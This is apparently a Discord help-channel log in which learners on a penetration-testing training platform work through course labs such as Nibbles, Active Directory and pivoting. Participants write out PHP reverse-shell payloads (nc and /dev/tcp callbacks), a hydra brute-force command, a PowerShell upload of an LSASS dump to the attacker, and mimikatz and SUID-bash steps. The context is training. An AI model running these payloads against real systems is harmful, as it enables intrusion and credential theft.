#modules
what?
cat the file. if you provided more context you can get more help, like what module/question you're on.
only gigi can view that
I get cat: flag.txt: Permission denied
@steady charm m telling that which one will u prefer hacking or cyber security
Sounds like you need to escalate your privileges or get creds to the file owner
I tried to switch users and the machine lags
you are asking which one I prefer, food or potatoes?
hacking is part of cyber security
Nah nah @steady charm it may be similar but has different works cs go for only finding ways to defend and hacking exploits and do hacking
through this command "su - gigi" ?
no idea because you still didn't say what module you're on
you don't need the "-"
just su gigi but you need the password
prolab
no idea then, probably need to ask in the appropriate prolab channel
you have a tv shows/movies view of hacking. ETHICAL hacking is part of Cyber Security, it's the first step in improving resilience
okay, thanks anyway
best to ask in #1263635449335910531
hi, i'm having some issues connecting via xfreerdp to the target in the module section "Internal Password Spraying from Windows" in the Attacking AD module
hacking is a subset of cybersecurity, doesn't make any sense to ask to choose between cybersecurity and hacking. should probably continue this conversation in #general
@steady charm nope it's like Bug Bounty and pen testing bug Bounty only goes for finding big and report but pen testing find vulnerabilities and resolves them
They r both alike but different
The xfreerdp command executes fine I get a cert warning and then my client attempts to connect but I get black screen instead of interface to the target
yeah this is not a module conversation and definitely not one worth entertaining
@dim wolf now who r u to interrupt
a moderator of this discord server
Also very poor attitude my dude
press space bar at the black screen to wake the pc up
This all is being such a drag
this is not the channel to be discussing stuff not related to Academy modules, if you want to continue you may do so in #general
Who cares
signal to noise, we need this space reserved for people who are actively working the academy
Rule #9
and those who wish to help
I am directly redirected to this chat
bro you can continue the conversation just in the appropriate channel 2 mods told you now.. just move the convo there so you don't get banned or something
this channel is like a library for studying not general talk
Should it be a common password, rock you would have found it already so I guess it is somewhere in the system ?
Any other hint anyone ?
Are you looking for something like crackstation
No
There should have been a password list you created
Press enter
This is what they call rainbow attack right? Although i liked it crackstation doesn't support salted passwords
There are many, are you talking about crafting one for will in particular?
There's not many you would have created
You attained will's password from the previous section
Why will's password be of any match to kira's possible passwords though?
Each user has a unique password
goddam it worked
It's literally something people have asked about a million times
yeah normally i search the messages... i didn't this time
Does anyone know if there will be any artwork for the new modules? I just finished the API Attacks module and noticed that it has a question mark badge.
That is the artwork.
They'll be added eventually
Usually 6+ months after they're released
You can see the artist message behind it to be curious, like really curious
maybe i need to actually pull the keys?
ok i see, the describe cmd doesnt actually list column info
For union to work, you need to have the same number of columns
yeah i thought the describe cmd listed columns, any way to do that without a select statement?
The 2 columns from one are dept_no and dept_name
or is that just the way to do it?
nvm chatgpt got me sorted: `show columns from table;`
oh... cols are the rows with describe
am facing the same issue
can someone help with this ?
```
dig axfr @10.129.203.6 inlanefreight.com
; <<>> DiG 9.18.16-1-Debian <<>> axfr @10.129.203.6 inlanefreight.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
```
been trying so many ways to fix this ... but none working
If you read further the issue was resolved. Use subbrute
yup i did it
So you found the x.inlanefreight.htb?
make sure you use the right ip in the resolvers.txt
That too
the subdomains right ?
Yes
i used the one the ip that was provided
So dig that subdomain
.
using the @ip
yup i did it
if it doesn't allow a transfer you may need to brute force it like marcielee said
So you did
dig axfr subdomain.inlanefreight.htb @ip on each found one?
Assuming you didn't mess with the names.txt
if this is the module i think it is, have you checked the BIND configs?
make sure /etc/hosts doesn't have anything in it
Did you use the target IP of the module?
```
dig axfr @10.129.203.6 blog.inlanefreight.com
; <<>> DiG 9.18.16-1-Debian <<>> axfr @10.129.203.6 blog.inlanefreight.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
```
yeah so it found the server and failed the axfr
yup did that as well
htb or com?
Rerun subbrute using inlanefreight.htb instead
alright imma update u
yo i got the flag ... thx alot guys, just a simple mistake i did
been there, done that, got the t-shirt (as marcie would say)
hi guys i am stuck in Attacking Common Services can anyone help me?
Hello everyone, I just finished Windows Event Logs & Finding Evil module and i would have a question regarding the last question in the Skills Assessment, not sure I really understand why the answer is the answer ...
The syntax used here on the BBH -> Sql Injection Fundamentals -> DB Enum Module: https://academy.hackthebox.com/module/33/section/217
Is this php syntax or mysql? module doesnt specify the reasoning behind its origin or use. too narrow for chat gpt to be of help.
im leaning php? as database() was previously used, but im only half sure that database() itself is php.
It's the syntax you'd write in the search field
hi guys i am stuck in Attacking Common Services can anyone help me? i am doing skill assessment easy but i cant find nothing any hint?
Scan for services first
sure, but i dont recognize that convention we've previously used things like standard sql syntax in the search field... and stuff like INFORMATION_SCHEMA... and TABLE_SCHEMA... nothing with a function or db.table notation
i did
what list should i use the one in resources?
You're injecting an sql command into the search query
Generally, yes
i got a user from smtp enum but i did use pws.list and found nothing on ftp,rdp,smtp
and used also the usernames.list and nothing
is it bug?
Lower
The password isn't deep on the list, so don't worry about it potentially taking forever
You don't need to be able to see the answers to arrive at the solution
yea sometimes u stuck dont know what ur doing wrong
In general; if cracking the password yields an error, or is taking > 20-30 minutes you're likely doing something wrong
when first starting out via the starting point, are the walkthroughs for you to go along and learn or more of just information?
yea probably wrong list
For starting-point, the walk-throughs are fine to follow, also read and follow #welcome to access #starting-point
It is asking a lsass dump right?
is pws.list is the correct list for this assessment easy?
Rockyou is fine
thanks
It's asking you to perform what's shown
Also; make sure to run cmd/powershell as admin before running mimikatz
marcielee how long it took u to remember all answers XD
ur pretty good
This is not what is shown in this module, mimikatz is shown to run a process as another user but why do this to extract hashes when we are already logged in as admin ?
What module?
ur amazing
What section
pass the hash
Also you're not using the right dump
You mean the method used to extract the hashes ? the hash dump ?
Learning how tools you use work prevents you from being a skid
i need help with the Command Injections - Skills Assessment
Did you try injecting the command?
i am still stuck in where exactly is the injection vector
Mess with all the functionalities of the service
||is it on the search or am i lost||
hi again i am still stuck is my username correct fiona?
still didnt crack that ftp with rockyou
It is not
Your username is before the @domain
yea i did
any hints
As I said... mess with the features available.. copy/move...
hydra -l f**** -P /usr/share/wordlists/rockyou.txt ftp://10.XXX.XXX.X -t2
is taking forever
That should work or 1 thread
oh ok
But it shouldn't take long
i lower it to 1
@fathom pendant
The fuck?
What does any of that have to do with htb academy?
ok first command the one in the site i managed to execute it
but no signs of mine is being used
Look for errors
Can a skill assessments in one section can be related to the previous section skills as well?
You mean a previous skill assessment in the same module?
Generally: no
But it depends
If they are linked, they're highly explicit about it being linked
i know of at least one that requires prerequisite knowledge from a previous module
Prerequisite knowledge sure, but exfiltrated data is a different thing
Hey guys, can someone give me a hint for the last question of the skill assessment of the dacl attack II module?
Hello everyone, brand new to HTB and pretty raw in IT/Cybersecurity in general (so please forgive my ignorance).
I'm on the Setting Up module within the InfoSec Foundations course. Am I supposed to be following all the steps concerning downloading all the different apps and setting up VMs? Or is it just a follow through example to give you the idea? I'm feeling a little overwhelmed with all the apps for notes, VMs, containers,
I was hoping everything I need would be within a pre-set VM image like in the CTF challenges?
No you don't need to follow every step
You won't find a vm that will contain all the tools
You will generally run into a situation where you'll need to download/install a tool
Great, thank you for the fast reply. I'll download each thing as I find I need it then, that seems much more palatable than staring down the long list of tools and learning how to use them all in one go. Thank you.
Oh I definitely wouldn't recommend learning the tools all at once
The academy modules generally stick to a handful of tools on a given module
i found the error and i managed to bypass the character but still cant move to next step
Keep trying other bypasses
You need to read a file, so... try that
You might need to combine methods
Hello,
I'm doing the Skill Assesment for the Active Directory Enumeration & Attack module.
I managed to run sharphound on the victim machine and I want to get the .zip file generated.
Do you guys have advice when it come to retrieve a file from the victim machine and upload it to our kali ?
I have a meterpreter shell but the download command is not working.
evil-winrm with the download command
there are many ways. a share via rdp is easy. you can scp with powershell. you could also just create an smb share.
Ok thanks for the advice I will try them
you can also set up an smb share with impacket. usually very functional
Thanks. I managed to get my .zip file but I will note your advice, it will definitely help me again
there's also a whole module on file transfers
It's in my ToDo list !
I swear to fkn god they're giving hints like enigma "Search for rights in non-common locations where you can control everything.". like yeah dude thx. "keep searching"
asking you to only use what you learned in the module, what a joke
so hard
It's fairly early on in the pentester job role path (if you're doing that)
i solved it what crazy challenge ngl
I am going to go crazy, spend a few good hours doing the AD Assessment 2 just for the DC to crap out at the last step. Insane...
I Think i will genuinely give up for this dog shit ass module. If anyone ever manages to solve the DACL attack II skill assessment i would gladly discuss on how you're a literal god. until then
OH NVM THE FREAKING VM'S CLOSED THEMSELVES.........asdasdasdjhasjdasjdsa
Timers do that to you
too bad I forgot about the timer existence, the assessment was too good. fully immersed
but this sucks...literally at the last step. all I had was to psexec inside the DC
if you saved the hash or the ccache file , you will get DC directly
Yup I am done
Just annoying I had to restart ligolo
One module left and I'm finally done
I was trying the AD module as I needed to learn more about this subject and it's really great. I will propably do the whole pentester job role path once i'm done with this module.
The pentester path builds off skills in itself
how guys!!!
Hey guys quick question about smtp enum ^^ #red-team message
yall i am TWEAKING for real
don't put it in that channel, put the help you need on a module here
Getting Started --> Nibbles Initial Foothold
I cannot get into the shell. I have literally been trying on and off for WEEKS and youtube walkthroughs are only confusing me more, i can't get past the part where you curl the myimage webpage
please please please can someone help me figure out why on earth a shell won't come up
ask in #starting-point
module: footprint
it looks like it is an academy module
Again, please do not share screenshots like that for modules over Tier 0.
is nibbles not a starting point machine?
Is there a reason?
maybe but its also in academy?
its in the Getting Started module, im not sure if that counts as starting point
Because posting potential spoilers for modules over Tier 0 is not allowed.
Oh okej sorry
Try and ask your question without posting such screenshots.
starting point machines are on the labs platform
my bad then
so you think you uploaded the file and then nothing? you can't access it or you can access it but can't do anything with it?
you're good, i was just confused
So can someone help me for smtp username enumeration? i already use some commands but all the usernames i tried were wrong
it doesn't connect
so is the php file there though? you are listening for it but the webpage exists?
if i remember if your image is uploaded try to refresh your browser
yes, the php file uploads
while opening a listner
so you have the listener open, you go visit the php page and nothing happens?
yes
i tried both by refreshing the page and by curling it, neither time does any shell start
and the php page has your IP for tun0 and your port for the listener? 9443 or whatever?
it should, how can i check?
look at the php file you upload?
Check to make sure you have the IP address of the PHP reverse shell set to match the IP address of your attack machine. Keep in mind that when you're doing a reverse shell, the target is the client and the attacker is the server.
yes, so you upload a php file, it has your tun0 IP and the port (9443 in that example), you go visit the PHP file you uploaded, and that works?
what is the tun0 IP, the target machine w nibbles on it right?
if so, then yeah that's the one
its your IP, if you are using your own VM, it is tun0
Read the PHP code and check to make sure you have the PwnBox IP address in it, because you want it to connect back to you.
if you are using the pwnbox, I'm not sure
i go to the php file, i get a blank page which i assume is what it's supposed to look like
Hi
ok but you upload the file, what is the IP and port in the php file you upload? it should be the attacker (aka you) IP and the port you are using for your reverse shell
in the file it says
<?php
system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.129.193.209 9443 >/tmp/f");
?>
with the ip being the target machine
Incorrect. You need the IP address there to be the attack machine IP.
basically you are telling the webserver, "connect back to me" and giving it the IP of wherever you put nc -nvlp 9443
alright, i changed that to the pwnbox ip
someone has an idea?
this is the command i tried: smtp-user-enum -U Downloads/footprinting-wordlist.txt -t 10.129.110.187
what module is this?
i did the lc -lvnp 9443 in cmd line and refreshed the page, it still isnt doing anything
as in, i'm still not getting the cmd line connection
and you reuploaded your php file?
that would be what a person with common sense would do, isn't it
one moment lemme do that lol
oh I haven't done that yet, so unsure but I'd say answers are very finicky and don't like spaces
The clue is in the name: "reverse" shell. You're telling the target server "I'm in charge now" and telling it to bring the shell to you.
ok i reuploaded the php and tried the steps again, still no response on the cmd
Check to make sure that you don't have 2 PHP pages on the target. Reuploads cause duplicates.
yeah maybe name it something else
The server doesn't overwrite anything. You need to make sure to point it at the new file name.
Also, always re-run Netcat before loading the new target page, because Netcat is just listening for connections from the target.
also you could try other shells too, this is the one I commonly use
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"<attacker ip>"/8888 0>&1'");?>
still nothing
yes
i will try this
Alright, try resetting the target machine and going from there.
yeah that is true, a reset is a good idea if you have been doing something and it is still failing
Also, is there any "Connection from" messages in the Netcat terminal? If so, then you actually do have a shell - by default, you won't see any shell prompts and need to actually run some commands like source /etc/bash.bashrc to actually get a prompt on the target.
didn't work
nope, it stays on
listening on [any] 8888 . . .
9443 when i used the previous one
so you tried mine, you put in the IP of the pwnbox and nothing?
i just tried it with this and it worked rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker ip> 4444 >/tmp/f
i will try that
that is your original one
hmm
my brain is fried from nibbles but i refuse to sleep tonight until i get past it
nibbles will torment me no longer
are you using the pwnbox only?
yes
For revshells use revshells.com
yeah i forgot to copy that part
this within system(""), right
yeah <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> 4444 >/tmp/f'); ?>
ok yeah ty
yeah that, you'll need to make sure whenever you doing a reverse shell as a php page you upload, you start it with <?php and end it with ?>
nope still no connection
ok so I hate to say it but can you do an ifconfig on your pwnbox and show it here?
its in this directory right? /nibbleblog/content/private/plugins/my_image
yeah
ok so it is tun0
what does your php file look like?
no it has this
<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 94.237.59.46 4444 >/tmp/f");
?>
Hey guys, I am new to Discord, and currently stuck on the 'Pivoting, Tunneling & Port Forwarding' module. Specifically, I cannot connect to the rdp as I keep getting the following error: "xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
[18:37:29:387] [215271:215272] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[18:37:29:387] [215271:215272] [ERROR][com.freerdp.core] - failed to connect to 172.16.5.19
".
This is from the 'Dynamic Port Forwarding with SSH and SOCKS Tunneling' chapter of the module, any suggestions?
so nc -lnvp 4444
yes
and <?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.228 4444 >/tmp/f");
?>
yes
and you uploaded as new file name?
yes
and you go to that in the webpage and /shell.php
and you get a blank page?
(if shell.php is what you named it that is)
yes
wait
is it supposed to show something other than image.php? because every time i upload a new thing it stays as image.php on the site, but the size of the file changes
so u have no other vms open?
so the page you visit is the one you upload
so if you upload shell.php, you go to that page, not the page where you upload files
yeah its image.php and the xml file
where is the file you uploaded?
so yours is imagemy.php?
most recent is zoi.php
where would i see it? it's not in this
http://nibbleblog/content/private/plugins/my_image/ is where it should be, so then yours would be http://nibbleblog/content/private/plugins/my_image/zoi.php as the page you visit
nah the box renames the file to image.php
Yeah I'm reading the walkthrough now
so then you do access image.php and then nothing happens?
<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.228 4444 >/tmp/f");
?>
no way
a freaking
try the original again
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
I am wondering if you do need /bin/sh vs sh
you will be a reverse shell master after this tho
OMG
got it?
hey look at you
no hopes up yet
what did you change
have to finish this through first before celebrating
i had .28 instead of .228
moment of truth
you are literal angels oh my god
cannot thank yall enough
i get to sleep tonight 
onwards and upwards
gotta get root now
by "your ip" which ip is it referring to? i tried the target and the 10.10 one
got connection refused 404 on the first and just 404 on the second
so your ip is the 10.10
you have to start a webserver on port 8080 on the pwnbox
and have LinEnum.sh in that directory of where you start the webserver
404
does it explain how to do this somewhere or is that an independent figure-out thing
yes, its on the privilege escalation page
grassyass
[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm facing trouble with finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?
godspeed, computer glitch username
ty
finishing up the assesment on BBH -> SQLi fundamentals -> SQL Assesment and we're thrown a bit of a curveball at the end, not sure how one is to ascertain the current working directory to write to, and how that even matters when root has perms to write wherever...
|| here's roots secure_file_priv contents ||
no. nonononononononononononono.
my pwnbox ran out of time and now i don't have access to the nibbles shell????
so I'm going by memory here but there is a mention of reading a file to get where the www root is, right?
oh thats a good idea...
that one, I don't remember Camil (maybe I should take better notes)
Thank you anyway for answering, Zojja
just put some 'speck on your name.
if I can figure out this sqlmap assessment, I can go look
we gucci we gucci i got it figured out
gucci mayne!
okkk, thanks!!
awesome
i never realized that the @ at the end of my nick name is not a good idea, indeed kkkkk thanks for pointing out!
Getting Started --> Nibbles - Privilege Escalation
I just did wget http://10.10.15.228:8080/LinEnum.sh and got a GET 404 on the other terminal. what could cause this?
a 404 error means it couldn't find the file requested
did you run python3 -m http.server?
a 404 means the server is up, and the server responded saying it couldn't find the file or page
yes
is the file in the directory you ran it?
what could cause it to not be able to find the file or page
wdym
linenum has to be in the same directory as the http server
is the LinEnum.sh file in the same directory you ran python3 -m http.server?
i dont understand, im sorry
ok so on the pwn box, you typed 'python3 -m http.server', right?
yes
the file, LinEnum.sh, must be in the same directory you used your python http.server command
sudo python3 -m http.server 8080
on pwnbox
wget http://10.10.15.228:8080/LinEnum.sh
on shell
put your webserver ip in firefox and check to get a better understanding
if linenum isnt in there then the file cant get downloaded
so where is the LinEnum.sh file ? what directory did you type 'sudo python3 -m http.server 8080'?
ohhhhh, /Desktop
so then your LinEnum.sh file will also need to be on Desktop
nibbler doesn't have a desktop
wym
not on nibbler, on the pwnbox
you are trying to transfer a file from the pwnbox to nibbler
in /home/nibbler, i did the wget
in ~/Desktop, i did sudo python -m http.server
ok so the file on the pwnbox you want to transfer to nibbler, has to be in ~/Desktop
paste this in firefox http://10.10.15.228:8080/
nope nvm i dont
u will understand
unable to connect
are you sure its 8080?
yes
ok firefox on the pwnbox
yes
if you type that in, you get unable to connect?
@signal shell
Do you need help with elastic stack still?
ok, so on your terminal with the sudo python3 -m http.server, do you see attempted connects?
ok so anyway, you are starting a webserver from your ~/Desktop
you want to transfer a file from ~/Desktop to nibbler
so you have to ensure that file is in the ~/Desktop folder
you get what we mean now?
no
you dont see any files in firefox?
so do you have LinEnum.sh somewhere on your pwnbox?
you might have to go find it (google or what not) if not
there are files
is linenum in there?
on pwnbox, not on nibbler
no
none that i see, but im not sure where to look
then u have to start the server where linenum is
i have to go, ill pick up with this tmrw
thank yall so much for your help, i really appreciate it

ok, it looks like the other module used linpeas, so you will have to go download LinEnum
and so you don't get in trouble, check out this page, it has a link to where you can get LinEnum.sh https://book.hacktricks.xyz/linux-hardening/privilege-escalation
Pivoting, Tunneling, and Port Forwarding/Web Server Pivoting with Rpivot. When I run this command on my attack host should i be getting feedback, or is it supposed to be waiting? python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
can you talk to the internal network?
what does that mean?
when u connect the client to the server
i cant remember if there is supposed to be output but the the best way to check would be to connect to the server and try to talk to the internal network
It's funny bc it's not that needed to figure out the privesc vector for the getting started - nibbles sections
ahh I think the walkthrough has it tho
The module walks you through it
trying rn
If it does, then there should be a link in the module
yeah should be
I mean for people that are totally new, seems confusing to them
99.9999% of the time, if a tool was mentioned that's from github or not in apt, then it's a link in the module/reading
I had to go check the module to see, they use Linpeas in another section but then mention downloading LinEnum through a python webserver
Imo it's easier to just have people see what they can [su]do
i got "New connection from host ..."
Linpeas and linenum just spit a lot of noise which can be very much counterproductive
on your attack box?
true
yeah
They're very much tools for more experienced people
when you run this on your attack box, does it give you any feedback or does it just sit open? python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
yeah
until i connect back
i read that wrong
i mean no it doesnt give me anything unless i connect to it
client.py --server-ip 10.10.14.18 --server-port 9999, i think this is the problem then, i should be putting in my attack box ip here huh?
yes
i get too lost in the sauce with the copy/paste sometimes haha...brb
your attack box opened port 9999
that was the issue, tysm
Hey guys, QQ, https://academy.hackthebox.com/module/112/section/1080 the third lab does not reuse credentials from the previous ones right?
ok stuck again, got here: New connection from host 10.129.233.233, source port 37394, added the line "socks4 127.0.0.1 9050" to the /etc/proxychains.conf, and ran the proxychains firefox-esr 172.16.5.135:80
on the attack box, but it is still spinning
@safe star
can u curl it?
whoa, i got it, not sure why that worked and the other way didn't
this Pivoting, Tunneling, and Port Forwarding got my head spinning
Each lab is independent unless explicitly told otherwise
229 Entering Extended Passive Mode (|||15660|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
why am i getting this
Because you downloaded a file via ftp?
The numbers in front of the lines are status codes
thank you, just finished this one
2xx codes are success, 1xx are info, 4xx are errors
3xx are usually "resource not in this location"
5xx are usually server response codes
Finally done with Footprinting module. It was so far the best experience in my few years of Cybersecurity.
FTP server return codes always have three digits, and each digit has a special meaning. The first digit denotes whether the response is good, bad or incomplete:
The second digit is a grouping digit and encodes the following information:
Below is a list of all known return codes that may be issued by an FTP server.
Frankly, the medium lab was harder than hardlab- for me.
This is just ks command
Ls*
Did it display the ls content? Perhaps ls -la to check for anything hidden
It did not display but I'll try ls la
Also helps to say which module and section you're doing
Footprinting lab easy
Rn
Ls -la
Worked
Thanks bro got a flag cause of that
I thought I lost my brain cells for a sec
Never forget the basics
Stuck with a Q on the Shells&Payloads module. Section PHP Webshells. The last Q asks how the uploaded picture is called. Thing is that I could upload a .php script, by adjusting the content-type. So the webshell I can access is just its name (with .php). The Question answer format is xxxx.gif. So I am confused. Can anyone shed a light on this?
Oh noooooo. Pfff. I should learn reading.
Thanks. I feel a bit silly now hahaha.
Footprinting lab medium I got an rdp connection and opened mssql management tool after that I changed it to windows authentication
And still I cant access
Look for an interesting file
Hi! When was the last update for Server-Side Attacks Module? it was the last year or a few weeks ago?
Thanks!
Module: Active Directory Enumeration & Attacks
Section: AD Skill assessment 1
I obtained access to MS01, how do I transfer file from the initial pivot host WEB01 (windows) to MS01?
does net use require smb in ms01 enabled?
I've been using ||xfreerdp's drive option|| and it is constantly disconnecting itself
try port forwarding
wait i read that wrong
Hello, has anyone here done the Information Gathering Web edition module new update? I'm stuck in the Subdomain Brute forcing part, I have tried using gobuster with DNS seclists with ns1-2.inlanefreight.com and with blog... but I get no results from it.
You are technically correct since I can portforward the web server port from attack host to the host beyond the pivot host
im using ligolo lemme figure it out
what does ur command look like?
i got it with 2 diff tools
Wait why do you transfer files from WEB01 to MS01? Do you want to transfer tools?
If xfreerdp doesn't work I can also suggest giving remmina a try. Never had trouble with mounting my system drives
if xfree ever died one more time imma just use remmina
(and yes I am trying to transfer tools)
remmina is nice because you work from a GUI. you can also set up connection profile to easily re-access a session. passing the hash is also very simple
gobuster --enum (blog or ns1 or ns2).inlanefreight.com - f ...seclists/discovery/DND/subdomains-top1million-20000.txt
thats the syntax for dnsenum
you dont need to add the subdomains
and I get the error: NS record query failed: NXDOMAIN
use --dnsserver 1.1.1.1 or a known dns server
it gives me the same error
and it just stops there?
resend the command updated
yes, it's weird if I try to manually access inlanefreight.com it seems that the site is down
before the command was working just not giving any results
ah
I did something dumb
i just didn't pay attention and changed .com to .htb
It worked!
thanks a lot
i was gonna ask that but u were typing .com in chat
but I don't quite understand why is it necessary to specify a dns server?
the dnsserver flag isnt needed
it automatically picks one from the resolve.conf im pretty sure
so why didn't it work without the --dnsserver flag?
well u said that u picked the wrong domain
any help why access is denied? the service is opened
yes I changed it right now but before that I used the good domain without the --dnsserver flag and dnsenum only found the ns1 ns2 and blog domains
hey there, I'm doing Sqlmap Essentials -> Database Enumeration, is http://.../case8.php the correct for this module? I'm kinda baffled, would appreciate the help
im not sure tbh maybe its the dns server the tool defaulted to
1.1.1.1 is the fastest resolver so i usually pick that
well in any case thanks a lot this was driving me nuts and I lost a good chunk of time
the question says case#1
thnx a lot!
Hey guys Im stuck on the last question for rpivot in the "Web Server Pivoting with Rpivot" section, I have successfully gotten to the Apache Default page but it says "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer."
try curl
Like curl -I http://<IP of Apache Default Page>:80 ?
yes
proxychains curl http://<IP of Apache Default Page>:80 ?
Cant see the flag, any idea what the flag should look like ?
some help pls?
what module
Password attack/Attacking LSASS
i dont know why access is denied
did you open cmd as admin?
yep i logged in as admin
I was able to but its just the default Apache Page, same contents with curl :/
ok service smbd was disabled
the flag is in there
i think
u missed it @faint geode
So should I be using the -I in the curl command ?
Ive tried with and without
there are multiple ways to transfer files
no just curl
its near the top
yeah nc too but i'm lazy
Is the server having issue, the target has been spawning for more than 30 minutes
ftp too
I'm working on the CrackMapExec module and I just can't get it to run in LDAP mode. I can't find any documentation about SMB shares in LDAP mode. Can anyone shed any light, please?
┌──(kali㉿kali)-[~/.cme]
└─$ crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01!
object address : 0xffff95ac4820
object refcount : 4
object type : 0x969dc8
object type name: NameError
object repr : NameError("name 'smb_share_name' is not defined")
lost sys.stderr
and powershell
(New-Object System.Net.WebClient).UploadFile('ftp://<ATTCK IP>/lsass.dmp','C:\lsass.dmp')
and just run "python3 -m pyftpdlib -w" on ur machine
In the CSS code ? Is it meant to start with HTB{ ?
Its not very clear at all what the flag is tbh
Is anybody working on module Intro to Windows Evasion? Seems there is a problem with InstallUtil task, it is unsolvable
it starts with "I"
i was able to use smbserver
Yeah i solved thanks, just restarted smbd
Theres only two instances of starting with I :/ none of them are it
look around the title
Does any one got any clue on mapping network folder/drive on remmina like in xfreerdp?
In xfreerdp I can simply provide the path in /drive:<path> it just werk
what about in remmina?
I have been digging around its documentation and guides
Nothing has worked :/ Im stumped, have checked the whole page even saved it to a file and cant find it..
Can I DM you ?
ye
I am stuck in Attacking Enterprise Networks
Active Directory Compromise module in question After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop. I have managed to get Server Admin privileges and get the admin hash but when i do PTH i get denied or timeout
did you try PsExec?
you can also just use nxc with the -x flag to type the file
hi guys anybody can help with skills assessment Attacking Common Services - Easy i am stuck on mysql part cant find what to search for
i do /home/username/folder
there is a big share folder field
i have no idea what the user is and you should remove that due to spoilers. but run psexec as the user that has administrative rights + their hash
ok thans
Got sorted, forgot to ping sweep the network for other IPs, once I found the other one I found the answer. Thanks @safe star
any help? on attacking common services?
use remmina instead
press enter
Remmina works so well thanks!
same problem will pop up in remmina
I don't think ms01 likes the idea of lazagne it freezes everytime I wanna transfer it
just press enter on the black screen
Thanks u
Module: AD
Section Skill Assessment 1
Question 6
I've been stuck w/ user t... as I am trying to look for its cleartext password
its hash cannot be cracked via rockyou and I looked around here to know that its cleartext password is available in memory or something.
Thus I tried mimikatz w/ logonPasswords, as well as lsassdump w/ mimikatz again.
Is there any other stuff I missed/overlooked?
Hi, I need help getting my crackmapexec to work even though impacket is installed, but it kept saying no module found
maybe install impacket via pip or pipx?
accidentally closed the previous session, now giving The specified service already exist error
any idea to fix this without resetting the lab
Tried NTDS w/ NXC, 0 hashes from ntds dumped
I've installed impacket with pipx and am still getting the same error when i try to run crackmapexec
possibly
can anybody help??? Attacking Common Services - Skill Assessment Easy
Use NetExec
i tried sudo pip3 install impacket and it somehow worked lol - even though i already have impacket installed
still better to use nxc, cme is not supported anymore. you are missing out on functionality
have u tried secretsdump?
anybody solved Attacking Common Services ??
send screenshot in dm
Got tpetty
u should get a password too
yep. It was in somewhere else I wasn't expected
you can have mine if you want
i'm evidently not using it
Can someone tell me why LSASS sometimes have cleartext creds and other times dont?
or if there a blog that explain this or something
web fuzzing module - API Fuzzing - Question : What is the value returned by the endpoint that the api fuzzer has identified? - I tries multiple wordlists (api_endpoint.txt,common.txt,etc) and found 3-4 directories/api after checking the content of it using "curl" I get the source code, a flag or some other directories... I even tries "-recursion" but I dont know what am i looking for ?? like what value am I looking for - I am sure I have tries every thing That I have found... What is this "value" I am looking for ?? Please help
guys i need serious help someone please?????
y'all please reply someone if you can I'm very nervous rn
what's the matter
IS THERE ANY WAY I CAN GET INSTAGRAM ACCOUNT BACK?
did you run a github .exe?
take a deep breath
your mother?
I REALLY NEED HELP TO RECOVER THAT DAMN ACCOUNT
if you are under 18 years old, don't try hacking
I'M 19 FGSSS
wdym being 18 doesn't give freepass to hacking.
CAN SOMEONE HELP ME?
ik
your only hope is to remember the password. walk on grass or something, it helped me when i forgot the password for my iphone-
it's like 7 years old account but it's public account it's embarrassing and I can't be on Instagram
Enough discord for today what am I reading
my cousin found she'll tell my mom
hello guys i found the flag for logrotate but in the acces.log file I chmod u+s /bin/bash and I get a shell. does anyone know if I should add anything to get a persistent shell? https://academy.hackthebox.com/module/51/section/1589
I am working on the Encrypted array section of the Secure coding 101 javascript module and I examining the following code function:
are you sure it's not associated with any number email?
@marsh echo ok hack my account then🥲🥲 then delete everything and have it I don't want it T_T
the phone was stolen email got stolen with phone i don't remember it
an account as old of 7 years, i'd think one always did not rely on password. you must have reset it before, which is either by using oldpassword or number or email.
but i can prove that's my account
was the email associated with any number?
guys there's one email on account but I don't have it
I am working on the Encrypted array section of the Secure coding 101 javascript module (https://academy.hackthebox.com/module/38/section/231) and I am examining the following code function:
They claim in the following in this section:
"We see that this function is very ambiguous, as it is filled with references of the _0x54f1 function, and so it doesn't make much sense so far. So, let's take a closer look at the _0x54f1 function, by holding [CTRL] within VSCode, and clicking on any of its references within the sendCode function, which should take us right to it.
Its first two lines are the following:
Code: javascript
k = k - 0;
var value = _0x29f8[k];
As this function starts with referencing another function _0x29f8, let's first understand what _0x29f8 is. We can once again hold [CTRL] and click on it to jump to it."
When I open up that function in VSCode editor and press 'CTRL' I can't find the Ox29f8 address or the two lines they are claiming are there
Can someone help me with the SQLMAP model
lol this chanel is not appropriate for this, as staff would say read the rules
i still have that number but it doesn't just work
you can have your account back if you just have the number that was linked to your email. usually they are. try numbers that were available in your device when you used that email. try forgetting email password
i tried that too idk why it doesn't work
sana sana...
learn academy htb
yea
you need to calm down. and move on. @marsh echo is right.
what do i do now is there like no any other way?
For whatever reason discord isn't letting me copy that code into here so I screenshot it. It can be found on the link I gave though
if you have a problem with your account try support
i did i had on tiktok and Instagram the tiktok is very good it removed my account in week but instagram oh i just hate it
i just want one way I'll be very happy if i get help
Reach out to Instagram Support
if you are really into hacking as a career sign up for academy and go thru any modules you like
